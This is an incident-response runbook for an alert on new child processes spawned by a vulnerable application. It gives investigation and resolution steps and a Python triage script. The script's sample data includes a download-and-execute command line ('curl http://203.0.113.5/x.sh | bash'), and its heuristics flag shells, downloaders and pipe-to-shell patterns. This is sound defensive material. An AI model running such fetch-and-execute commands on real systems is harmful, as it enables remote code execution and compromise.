New Child Launched From Vulnerable Application
This alert fires when an application that Lacework has flagged as vulnerable (one running software with known, unpatched vulnerabilities) launches a child process that has not been observed from it before. A vulnerable parent spawning a new child is a common sign that the vulnerability was exploited to execute additional code: the attacker's payload runs as a "child process" (or "child application") of the vulnerable parent and inherits that parent's user and privileges.
Why this alert is important
This alert is significant because it may indicate that an attacker has exploited the vulnerability to run code on the system. The child is often a shell, a download tool, or a dropped binary used to steal sensitive data, install malware or a backdoor, establish persistence, or pivot to other systems. Because the alert is based on a parent/child pairing that is new for this host rather than on a signature, it can also fire on benign activity (for example an administrator invoking a command from within the vulnerable application), so it should be triaged rather than assumed to be a compromise.
Investigation
Follow these steps to investigate the alert:
- Identify the vulnerable parent application named in the alert: the host, the executable path, the user it runs as, and how it is exposed (for example, whether it listens on the network or processes untrusted input).
- Determine the nature of the vulnerability. Look up the vulnerability findings for that application (the package and the CVEs flagged on the host) and check whether they allow remote code execution and whether a public exploit exists; this tells you how plausible exploitation is.
- Identify the child process: its executable path, full command line, user, start time, and any processes it launched in turn. A shell (sh, bash), a download tool (curl, wget), a scripting interpreter, or a binary executed from /tmp or another world-writable directory is rarely a legitimate child of a server process.
- Analyze the behavior of the child process and its descendants: outbound network connections (especially to unfamiliar addresses), files written or modified, sensitive files or credentials read, and any new users, cron entries, or services it created.
- Correlate with other evidence. Review the application's own logs (for a web application, the access log around the child's start time can reveal the request that triggered exploitation), authentication logs, and other alerts on the same host, and look for anomalous network traffic or file activity.
- Assess the potential impact of the incident. Determine whether sensitive data, credentials, or other systems reachable from this host may have been compromised, and take appropriate action to mitigate the risk.
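The investigation steps above amount to building the process tree, finding the children of the vulnerable parent, and scoring what they did. The script below is an added example of that triage, not Lacework code: it reads process events in a constructed JSON-lines schema (pid, ppid, user, exe, cmdline, ts), takes a constructed map of executable path to vulnerability finding, and for each direct child of a vulnerable parent reports the parent chain, the child's descendants, and the reasons it looks suspicious. The sample events, the field names and the heuristics are assumptions for illustration; adapt them to the process data your agent or EDR exports.

```python
"""Triage helper for a "new child launched from vulnerable application" alert.

Added example, not Lacework code. The event schema, the vulnerable-application
map and the sample data are constructed for illustration.
"""
import json
import re
from collections import defaultdict

# Process names and command-line patterns that are rarely legitimate children
# of a server process (assumed heuristics; extend for your environment).
SHELLS = {"sh", "bash", "dash", "zsh", "ash"}
DOWNLOADERS = {"curl", "wget"}
PIPE_TO_SHELL = re.compile(r"\|\s*(ba|da|z)?sh\b")

# Constructed sample: a Java service flagged as vulnerable spawns a shell that
# downloads and runs a script; cron spawning logrotate is normal activity.
SAMPLE_EVENTS = """
{"ts":"2024-05-01T10:00:00Z","pid":1,"ppid":0,"user":"root","exe":"/sbin/init","cmdline":"/sbin/init"}
{"ts":"2024-05-01T10:00:01Z","pid":842,"ppid":1,"user":"www-data","exe":"/usr/bin/java","cmdline":"java -jar /opt/app/app.jar"}
{"ts":"2024-05-01T10:00:02Z","pid":850,"ppid":1,"user":"root","exe":"/usr/sbin/cron","cmdline":"/usr/sbin/cron -f"}
{"ts":"2024-05-01T10:05:10Z","pid":1201,"ppid":842,"user":"www-data","exe":"/bin/sh","cmdline":"sh -c curl http://203.0.113.5/x.sh | bash"}
{"ts":"2024-05-01T10:05:11Z","pid":1202,"ppid":1201,"user":"www-data","exe":"/usr/bin/curl","cmdline":"curl http://203.0.113.5/x.sh"}
{"ts":"2024-05-01T10:05:11Z","pid":1203,"ppid":1201,"user":"www-data","exe":"/bin/bash","cmdline":"bash"}
{"ts":"2024-05-01T10:06:00Z","pid":1300,"ppid":850,"user":"root","exe":"/bin/sh","cmdline":"sh -c /usr/bin/logrotate /etc/logrotate.conf"}
"""

# Constructed finding: which executables the vulnerability scan flagged and why.
VULNERABLE_APPS = {
    "/usr/bin/java": "/opt/app/app.jar bundles a library with a critical RCE CVE (constructed finding)",
}


def parse_events(text):
    """Parse JSON-lines process events into dicts, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def build_tree(events):
    """Index events by pid and by parent pid so the tree can be walked both ways."""
    by_pid = {e["pid"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e)
    return by_pid, children


def ancestry(pid, by_pid):
    """Return the events from the root of the tree down to pid (cycle-safe)."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid]["ppid"]
    return list(reversed(chain))


def descendants(pid, children):
    """Return every process below pid, breadth-first."""
    out, queue = [], list(children.get(pid, []))
    while queue:
        e = queue.pop(0)
        out.append(e)
        queue.extend(children.get(e["pid"], []))
    return out


def suspicious_reasons(proc, parent):
    """Heuristic reasons a process is worth a closer look given its parent."""
    reasons = []
    name = proc["exe"].rsplit("/", 1)[-1]
    if name in SHELLS:
        reasons.append("shell interpreter launched")
    if name in DOWNLOADERS:
        reasons.append("download tool launched")
    if PIPE_TO_SHELL.search(proc["cmdline"]):
        reasons.append("command line pipes downloaded content into a shell")
    if proc["user"] != parent["user"]:
        reasons.append(f"user changed from {parent['user']} to {proc['user']}")
    return reasons


def triage(text, vulnerable_apps):
    """One finding per direct child of a vulnerable parent, with its subtree scored."""
    events = parse_events(text)
    by_pid, children = build_tree(events)
    findings = []
    for parent in events:
        if parent["exe"] not in vulnerable_apps:
            continue
        for child in children.get(parent["pid"], []):
            subtree = descendants(child["pid"], children)
            reasons = suspicious_reasons(child, parent)
            for d in subtree:
                reasons.extend(suspicious_reasons(d, by_pid[d["ppid"]]))
            findings.append({
                "child_pid": child["pid"],
                "vulnerability": vulnerable_apps[parent["exe"]],
                "chain": " -> ".join(e["exe"] for e in ancestry(child["pid"], by_pid)),
                "cmdline": child["cmdline"],
                "started": child["ts"],
                "descendants": [d["pid"] for d in subtree],
                "reasons": sorted(set(reasons)),
            })
    return findings


if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_EVENTS, VULNERABLE_APPS), indent=2))
```

On the sample data the script reports a single finding: the shell (pid 1201) under the vulnerable Java service, with its curl and bash descendants and the piped-download command line as reasons, while cron's logrotate child is ignored because cron was not flagged as vulnerable. The `started` timestamp is the pivot for the log correlation step: search the application's access log for requests just before it.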
Resolution
Use the following steps to resolve this alert:
- If the child process is malicious, contain the host first: isolate it from the network, terminate the child process and anything it spawned, and preserve the child's binary, command line and relevant logs for forensics before the workload is rebuilt.
- Patch or upgrade the vulnerable application to a fixed version to eliminate the known vulnerability. If no fix is available yet, reduce exposure in the meantime, for example by restricting network access to the application or disabling the vulnerable feature.
- If the host was compromised, rotate any credentials, keys or tokens that the application or the host could access, since the child process ran with the application's privileges.
- Implement security controls such as firewalls or network policies that limit what the application can reach, intrusion detection, and endpoint protection, so that exploitation of a future vulnerability is both constrained and detected.
- Regularly monitor system logs and process activity for signs of unauthorized access or malicious activity, and take appropriate action to remediate any identified issues.